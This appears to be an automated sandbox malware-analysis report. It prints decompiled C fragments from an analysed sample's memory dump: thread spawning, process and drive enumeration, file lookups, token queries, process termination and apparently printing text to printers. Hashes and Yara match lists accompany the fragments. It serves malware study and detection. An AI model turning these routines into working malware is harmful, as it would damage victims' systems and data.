                  Function 00D0E144 Relevance: 3.0, APIs: 2, Instructions: 46nativethreadCOMMON
                  Download Yara Rule
                  C-Code - Quality: 58%
                  			E00D0E144() {
				struct _SECURITY_ATTRIBUTES* _v8;
				void* _t9;
				void* _t14;
				void* _t19;
				void* _t20;

				_t9 = E00D01564();
				_t18 =  >  ? 0x20 : _t9;
				_t19 = 1 + ( >  ? 0x20 : _t9) * 2;
				_v8 = 0;
				 *0xd25880 =  *0xd25550(0xffffffff, 0, 0, _t19);
				if( *0xd25880 != 0) {
					do {
						_t14 = CreateThread(0, 0, E00D0DDD4, 0, 0, 0); // executed
						_t20 = _t14;
						if(_t20 != 0) {
							E00D0B414(_t14, _t20);
							NtClose(_t20); // executed
							_v8 =  &(_v8->nLength);
						}
						_t19 = _t19 - 1;
					} while (_t19 != 0);
				}
				 *0xd254ac(0xd25890);
				return _v8;
			}








                  0x00d0e14c
                  0x00d0e15a
                  0x00d0e15d
                  0x00d0e164
                  0x00d0e178
                  0x00d0e184
                  0x00d0e186
                  0x00d0e195
                  0x00d0e19b
                  0x00d0e19f
                  0x00d0e1a2
                  0x00d0e1a8
                  0x00d0e1ae
                  0x00d0e1ae
                  0x00d0e1b1
                  0x00d0e1b2
                  0x00d0e186
                  0x00d0e1bb
                  0x00d0e1c9

                  APIs
                  • CreateThread.KERNELBASE(00000000,00000000,00D0DDD4,00000000,00000000,00000000,?,00000000), ref: 00D0E195
                  • NtClose.NTDLL(00000000,00000000,?,00000000), ref: 00D0E1A8
                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseCreateThread
                  • String ID:
                  • API String ID: 562768112-0
                  • Opcode ID: 0be5e8d1bea81e7b04a98cdbba959ef46486bd180f8539999c3e19ba2902c8e0
                  • Instruction ID: f645fa0d0ee113fdb09752882fe1dea38deadb257aaf4bc9c91b9953a3f4de30
                  • Opcode Fuzzy Hash: 0be5e8d1bea81e7b04a98cdbba959ef46486bd180f8539999c3e19ba2902c8e0
                  • Instruction Fuzzy Hash: AD018630741B14FBE730AB54BC89F9DB764EB14B15F600351F909E63E1DBB09A0686B5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D0B390 Relevance: 3.0, APIs: 2, Instructions: 43nativethreadCOMMON
                  Download Yara Rule
                  C-Code - Quality: 24%
                  			E00D0B390(intOrPtr _a4, void* _a8) {
				void _v8;
				char _v32;
				intOrPtr* _t14;
				long _t20;
				void* _t22;

				_t22 = 0;
				if(_a4 != 0) {
					_t14 =  &_v32;
					 *_t14 = 0x18;
					 *((intOrPtr*)(_t14 + 4)) = 0;
					 *((intOrPtr*)(_t14 + 8)) = 0;
					 *((intOrPtr*)(_t14 + 0xc)) = 0;
					 *((intOrPtr*)(_t14 + 0x10)) = 0;
					 *((intOrPtr*)(_t14 + 0x14)) = 0;
					_push( &_v8);
					_push(2);
					_push(0);
					_push( &_v32);
					_push(0xc);
					_push(_a4);
					if( *0xd25478() == 0) {
						_t20 = NtSetInformationThread(_a8, 5,  &_v8, 4); // executed
						if(_t20 == 0) {
							_t22 = 1;
						}
						NtClose(_v8); // executed
					}
				} else {
					_t22 = 1;
				}
				return _t22;
			}








                  0x00d0b397
                  0x00d0b39d
                  0x00d0b3a2
                  0x00d0b3a5
                  0x00d0b3ab
                  0x00d0b3b2
                  0x00d0b3b9
                  0x00d0b3c0
                  0x00d0b3c7
                  0x00d0b3d1
                  0x00d0b3d2
                  0x00d0b3d4
                  0x00d0b3d9
                  0x00d0b3da
                  0x00d0b3dc
                  0x00d0b3e7
                  0x00d0b3f4
                  0x00d0b3fc
                  0x00d0b3fe
                  0x00d0b3fe
                  0x00d0b402
                  0x00d0b402
                  0x00d0b39f
                  0x00d0b39f
                  0x00d0b39f
                  0x00d0b40e

                  APIs
                  • NtSetInformationThread.NTDLL(000000FE,00000005,00000008,00000004), ref: 00D0B3F4
                  • NtClose.NTDLL(00000008), ref: 00D0B402
                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseInformationThread
                  • String ID:
                  • API String ID: 3167811113-0
                  • Opcode ID: fc55a0ea142d6c41f606019e8837f91ef8a9edfa9284b252a3f6508fb14649eb
                  • Instruction ID: 1f159f0d06fa2c99b10556dec19825c761121aa20000f69f82a1eefce6e6aec2
                  • Opcode Fuzzy Hash: fc55a0ea142d6c41f606019e8837f91ef8a9edfa9284b252a3f6508fb14649eb
                  • Instruction Fuzzy Hash: 0C014470504208EFE710DF50DC89FAABBA8FB10319F548165E914DB1E1D775DA45DBA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D0A064 Relevance: 3.0, APIs: 2, Instructions: 27COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00D0A064(WCHAR* _a4, intOrPtr* _a8) {
				union _FINDEX_INFO_LEVELS _v8;
				void* _v12;
				intOrPtr _v572;
				intOrPtr _v576;
				void _v604;
				void* _t14;
				int _t17;
				intOrPtr* _t18;

				_v8 = 0;
				_t14 = FindFirstFileExW(_a4, 0,  &_v604, 0, 0, 0); // executed
				_v12 = _t14;
				if(_v12 != 0xffffffff) {
					_t18 = _a8;
					 *_t18 = _v572;
					 *((intOrPtr*)(_t18 + 4)) = _v576;
					_t17 = FindClose(_v12); // executed
					_v8 = _t17;
				}
				return _v8;
			}











                  0x00d0a06d
                  0x00d0a086
                  0x00d0a08c
                  0x00d0a093
                  0x00d0a0a1
                  0x00d0a0a4
                  0x00d0a0a6
                  0x00d0a0ac
                  0x00d0a0b2
                  0x00d0a0b2
                  0x00d0a0bb

                  APIs
                  • FindFirstFileExW.KERNELBASE(?,00000000,?,00000000,00000000,00000000), ref: 00D0A086
                  • FindClose.KERNELBASE(000000FF), ref: 00D0A0AC
                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$CloseFileFirst
                  • String ID:
                  • API String ID: 2295610775-0
                  • Opcode ID: b2bbacccc6d91ab0723332f5f95d98879eb2347856c29b300f9be4db4f276393
                  • Instruction ID: 1cb82ef80a9e11855a2cc0d72d18b57d5552cfc048abaa654ace8949281686fe
                  • Opcode Fuzzy Hash: b2bbacccc6d91ab0723332f5f95d98879eb2347856c29b300f9be4db4f276393
                  • Instruction Fuzzy Hash: 66F01774901308EFDB20DF94DC49B9CBBB4EB48310F208295A818AB3A0D7716A92CF54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D09850 Relevance: 1.6, APIs: 1, Instructions: 68nativeCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Close
                  • String ID:
                  • API String ID: 3535843008-0
                  • Opcode ID: e793d9efe10d35fc43c08cc4acd2b8e087bd1e68925d64242b558aa4ef5da659
                  • Instruction ID: 8c8334e412604347316d0dbb109b67534d13223fb23ece1c5d0853419ced9415
                  • Opcode Fuzzy Hash: e793d9efe10d35fc43c08cc4acd2b8e087bd1e68925d64242b558aa4ef5da659
                  • Instruction Fuzzy Hash: C431BA7080020CEFEB11CF94D858BEEBBB8FB04319F648159E414BA291D7769A49DFA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D097A8 Relevance: 1.6, APIs: 1, Instructions: 57nativeCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00D097A8(intOrPtr _a4) {
				intOrPtr _v8;
				long _v12;
				void* _v16;
				long _t24;
				void* _t27;
				intOrPtr* _t32;
				intOrPtr _t33;

				_v8 = 0;
				_v12 = 0x400;
				_v16 = E00D06830(_v12);
				while(1) {
					_t24 = NtQuerySystemInformation(5, _v16, _v12,  &_v12); // executed
					if(_t24 == 0) {
						break;
					}
					if(_t24 != 0xc0000004) {
						E00D0684C(_v16);
						return _v8;
					} else {
						_t27 = E00D06868(_v16, _v12); // executed
						_v16 = _t27;
						continue;
					}
					L12:
				}
				_t32 = _v16;
				while(1) {
					_t33 =  *_t32;
					if( *((intOrPtr*)(_t32 + 0x3c)) != 0 && E00D011D4( *((intOrPtr*)(_t32 + 0x3c)), 0) == _a4) {
						break;
					}
					_t32 = _t32 + _t33;
					if(_t33 != 0) {
						continue;
					}
					L11:
					E00D0684C(_v16); // executed
					return _v8;
					goto L12;
				}
				_v8 =  *((intOrPtr*)(_t32 + 0x44));
				goto L11;
			}










                  0x00d097b0
                  0x00d097b7
                  0x00d097c6
                  0x00d097c9
                  0x00d097d5
                  0x00d097dd
                  0x00000000
                  0x00000000
                  0x00d097e8
                  0x00d097ff
                  0x00d0980c
                  0x00d097ea
                  0x00d097f0
                  0x00d097f5
                  0x00000000
                  0x00d097f5
                  0x00000000
                  0x00d097e8
                  0x00d09811
                  0x00d09814
                  0x00d09814
                  0x00d0981a
                  0x00000000
                  0x00000000
                  0x00d09833
                  0x00d09838
                  0x00000000
                  0x00000000
                  0x00d0983a
                  0x00d0983d
                  0x00d0984a
                  0x00000000
                  0x00d0984a
                  0x00d0982e
                  0x00000000

                  APIs
                    • Part of subcall function 00D06830: RtlAllocateHeap.NTDLL(?,00000008,00000000,?,00D176B5,?,00000000,00000000), ref: 00D06841
                  • NtQuerySystemInformation.NTDLL(00000005,?,00000400,00000400,00000400), ref: 00D097D5
                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateHeapInformationQuerySystem
                  • String ID:
                  • API String ID: 3114120137-0
                  • Opcode ID: 33100429f8d9c222589c795a06a86f451512f8735640349ec434acc76cea3e09
                  • Instruction ID: 8d15ac27c56a80b935070b25a92c66d8f4a3c67212c579eb02db0757354e114a
                  • Opcode Fuzzy Hash: 33100429f8d9c222589c795a06a86f451512f8735640349ec434acc76cea3e09
                  • Instruction Fuzzy Hash: 9B111672D00108EBCF11DF94D880B9DFB78EF05310F6081A6EA18A6292D7329A60DBB0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D05A30 Relevance: 1.5, APIs: 1, Instructions: 40libraryloaderCOMMON
                  Download Yara Rule
                  APIs
                  • LdrLoadDll.NTDLL(00000000,00000000,00000000,?), ref: 00D05A81
                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Load
                  • String ID:
                  • API String ID: 2234796835-0
                  • Opcode ID: 33891e1741011934e999464b3082a14304210a455c40e3fc271a97d08bf4e165
                  • Instruction ID: e7c975458c7bef8f70405b2c44acaf9db1da6fe3cec6a4f407ab9f0c35fbf733
                  • Opcode Fuzzy Hash: 33891e1741011934e999464b3082a14304210a455c40e3fc271a97d08bf4e165
                  • Instruction Fuzzy Hash: BFF0313690010DFACF10EA94E848FDEB7BCEB14314F5041A2E909E3080D630AB089FB0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D0B5D0 Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                  Download Yara Rule
                  APIs
                  • NtQueryInformationToken.NTDLL(?,00000001,?,0000002C,?), ref: 00D0B5FA
                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: InformationQueryToken
                  • String ID:
                  • API String ID: 4239771691-0
                  • Opcode ID: 9a6ecfc4e0e88c084019c203d47b73825f4b0e6cd26f7fb970d81be83e94f0db
                  • Instruction ID: ba5edc4e058adaef978e214139f41aec39e93c9c518c6ed9e298c8e268dcb9cf
                  • Opcode Fuzzy Hash: 9a6ecfc4e0e88c084019c203d47b73825f4b0e6cd26f7fb970d81be83e94f0db
                  • Instruction Fuzzy Hash: 76F03031604208AFEB20DB94EC85FA9B76DFB14725F940166F918D72E0E772AE448A20
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D0DBBC Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                  Download Yara Rule
                  APIs
                  • NtTerminateProcess.NTDLL(00D07D88,00000000), ref: 00D0DC1F
                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ProcessTerminate
                  • String ID:
                  • API String ID: 560597551-0
                  • Opcode ID: d50f245554c80761ea7c5823cac89b259fdcdb94ad0a36e4807bcdd5cd47b7ef
                  • Instruction ID: 55a306e0d6f187826b361d5cc90ab69f6d6d585ff86f5501f7d81bc72a655a47
                  • Opcode Fuzzy Hash: d50f245554c80761ea7c5823cac89b259fdcdb94ad0a36e4807bcdd5cd47b7ef
                  • Instruction Fuzzy Hash: AD01EC70900308EFDB10CF90D848BDEBBB8FB14319F548199E504AB291D7B79646CFA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D097FA Relevance: 1.5, APIs: 1, Instructions: 31nativeCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00D097FA() {
				long _t19;
				void* _t22;
				void* _t28;
				void _t31;
				void* _t33;

				while(1) {
					_t19 = NtQuerySystemInformation(5,  *(_t33 - 0xc),  *(_t33 - 8), _t33 - 8); // executed
					if(_t19 == 0) {
						break;
					}
					if(_t19 != 0xc0000004) {
						E00D0684C( *(_t33 - 0xc));
						return  *((intOrPtr*)(_t33 - 4));
					} else {
						_t22 = E00D06868( *(_t33 - 0xc),  *(_t33 - 8)); // executed
						 *(_t33 - 0xc) = _t22;
						continue;
					}
					L13:
				}
				_t28 =  *(_t33 - 0xc);
				while(1) {
					_t31 =  *_t28;
					if( *((intOrPtr*)(_t28 + 0x3c)) != 0 && E00D011D4( *((intOrPtr*)(_t28 + 0x3c)), 0) ==  *((intOrPtr*)(_t33 + 8))) {
						break;
					}
					_t28 = _t28 + _t31;
					if(_t31 != 0) {
						continue;
					}
					L12:
					E00D0684C( *(_t33 - 0xc)); // executed
					return  *((intOrPtr*)(_t33 - 4));
					goto L13;
				}
				 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t28 + 0x44));
				goto L12;
			}








                  0x00d097c9
                  0x00d097d5
                  0x00d097dd
                  0x00000000
                  0x00000000
                  0x00d097e8
                  0x00d097ff
                  0x00d0980c
                  0x00d097ea
                  0x00d097f0
                  0x00d097f5
                  0x00000000
                  0x00d097f5
                  0x00000000
                  0x00d097e8
                  0x00d09811
                  0x00d09814
                  0x00d09814
                  0x00d0981a
                  0x00000000
                  0x00000000
                  0x00d09833
                  0x00d09838
                  0x00000000
                  0x00000000
                  0x00d0983a
                  0x00d0983d
                  0x00d0984a
                  0x00000000
                  0x00d0984a
                  0x00d0982e
                  0x00000000

                  APIs
                  • NtQuerySystemInformation.NTDLL(00000005,?,00000400,00000400,00000400), ref: 00D097D5
                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: InformationQuerySystem
                  • String ID:
                  • API String ID: 3562636166-0
                  • Opcode ID: f8d6bc6ff912222e976f0da3eb08dc766ad774b18cc209b657e7d89de78124d1
                  • Instruction ID: 4c13b344b66f8d05db867094ef209634cb3cd66d802688861def660bb9994b9b
                  • Opcode Fuzzy Hash: f8d6bc6ff912222e976f0da3eb08dc766ad774b18cc209b657e7d89de78124d1
                  • Instruction Fuzzy Hash: AAF01736904108EBCF10DF80D890BACFB74EF19301F64C092EA09A6296D2719A50EB31
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D097E1 Relevance: 1.5, APIs: 1, Instructions: 31nativeCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00D097E1() {
				long _t19;
				void* _t22;
				void* _t28;
				void _t31;
				void* _t33;

				while(1) {
					_t19 = NtQuerySystemInformation(5,  *(_t33 - 0xc),  *(_t33 - 8), _t33 - 8); // executed
					if(_t19 == 0) {
						break;
					}
					if(_t19 != 0xc0000004) {
						E00D0684C( *(_t33 - 0xc));
						return  *((intOrPtr*)(_t33 - 4));
					} else {
						_t22 = E00D06868( *(_t33 - 0xc),  *(_t33 - 8)); // executed
						 *(_t33 - 0xc) = _t22;
						continue;
					}
					L13:
				}
				_t28 =  *(_t33 - 0xc);
				while(1) {
					_t31 =  *_t28;
					if( *((intOrPtr*)(_t28 + 0x3c)) != 0 && E00D011D4( *((intOrPtr*)(_t28 + 0x3c)), 0) ==  *((intOrPtr*)(_t33 + 8))) {
						break;
					}
					_t28 = _t28 + _t31;
					if(_t31 != 0) {
						continue;
					}
					L12:
					E00D0684C( *(_t33 - 0xc)); // executed
					return  *((intOrPtr*)(_t33 - 4));
					goto L13;
				}
				 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t28 + 0x44));
				goto L12;
			}








                  0x00d097c9
                  0x00d097d5
                  0x00d097dd
                  0x00000000
                  0x00000000
                  0x00d097e8
                  0x00d097ff
                  0x00d0980c
                  0x00d097ea
                  0x00d097f0
                  0x00d097f5
                  0x00000000
                  0x00d097f5
                  0x00000000
                  0x00d097e8
                  0x00d09811
                  0x00d09814
                  0x00d09814
                  0x00d0981a
                  0x00000000
                  0x00000000
                  0x00d09833
                  0x00d09838
                  0x00000000
                  0x00000000
                  0x00d0983a
                  0x00d0983d
                  0x00d0984a
                  0x00000000
                  0x00d0984a
                  0x00d0982e
                  0x00000000

                  APIs
                  • NtQuerySystemInformation.NTDLL(00000005,?,00000400,00000400,00000400), ref: 00D097D5
                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: InformationQuerySystem
                  • String ID:
                  • API String ID: 3562636166-0
                  • Opcode ID: 701504c6462769d3eed007833cdd5ad1c7deeafe8a8d2f56d761dde65734a610
                  • Instruction ID: 4c13b344b66f8d05db867094ef209634cb3cd66d802688861def660bb9994b9b
                  • Opcode Fuzzy Hash: 701504c6462769d3eed007833cdd5ad1c7deeafe8a8d2f56d761dde65734a610
                  • Instruction Fuzzy Hash: AAF01736904108EBCF10DF80D890BACFB74EF19301F64C092EA09A6296D2719A50EB31
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D0A440 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00D0A440(long* _a4) {
				long _t4;

				_t4 = GetLogicalDriveStringsW( *_a4, _a4[1]); // executed
				return _t4;
			}




                  0x00d0a44b
                  0x00d0a452

                  APIs
                  • GetLogicalDriveStringsW.KERNELBASE(?,?), ref: 00D0A44B
                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: DriveLogicalStrings
                  • String ID:
                  • API String ID: 2022863570-0
                  • Opcode ID: e62bbb0430f8d27f42b04c90fd778171ac6b8c4dddf738ad230b7f631b83b0f0
                  • Instruction ID: 69c7dc3c4a4afba9afd0e69ba711de7617568326b1baba4f4806e14971c34ffe
                  • Opcode Fuzzy Hash: e62bbb0430f8d27f42b04c90fd778171ac6b8c4dddf738ad230b7f631b83b0f0
                  • Instruction Fuzzy Hash: 9EC09236000308EF8B019F88ED48C85BFEAEB287007048061F6088B235CB32E821EBA5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D0BB94 Relevance: 6.2, APIs: 4, Instructions: 190COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 524 d0bb94-d0bbbe 526 d0bbc0 524->526 527 d0bbc5-d0bbdc 524->527 528 d0bde8-d0bdec 526->528 532 d0bbe3-d0bbf0 call d06830 527->532 533 d0bbde 527->533 530 d0bdf7-d0bdfb 528->530 531 d0bdee 528->531 534 d0be06-d0be0a 530->534 535 d0bdfd 530->535 531->530 543 d0bbf2 532->543 544 d0bbf7-d0bc52 call d01250 CreateDCW 532->544 533->528 537 d0be14-d0be18 534->537 538 d0be0c-d0be0f call d0684c 534->538 535->534 539 d0be23-d0be28 537->539 540 d0be1a 537->540 538->537 540->539 543->528 548 d0bc54 544->548 549 d0bc59-d0bd23 call d01250 StartDocW 544->549 548->528 560 d0bd25 549->560 561 d0bd2a-d0bd35 call d01730 549->561 560->528 564 d0bd3a-d0bd46 561->564 566 d0bd48 564->566 567 d0bd4a-d0bdc2 DrawTextA EndPage 564->567 568 d0bdc8-d0bddf call d01730 566->568 567->564 567->568 568->528
                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
